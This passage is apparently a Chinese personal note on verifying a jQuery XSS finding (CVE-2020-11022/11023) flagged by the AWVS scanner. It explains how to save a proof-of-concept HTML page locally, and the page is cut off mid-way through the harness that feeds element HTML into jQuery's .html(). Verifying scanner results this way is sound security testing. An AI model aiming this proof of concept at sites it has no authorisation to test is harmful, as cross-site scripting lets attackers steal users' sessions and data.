AWVS扫出来Vulnerable Javascript library漏洞,然后查询资料,验证漏洞,仅做记录。
参考:
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
一开始没看懂怎么操作,后面明白了
payload复制本地保存一份html,然后替换AWVS扫描出来的src,重新网页打开即可验证。
payload:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
<script src="js地址"></script>
</head>
<body>
<script>
function test(n,jq){
sanitizedHTML = document.getElementById('poc'+n).innerHTML;
if(jq){
$('#div').html(sanitizedHTML);
}else{
div.innerHTML=sanitizedHTML;
}
}
</script>
<h1>jQuery XSS Ex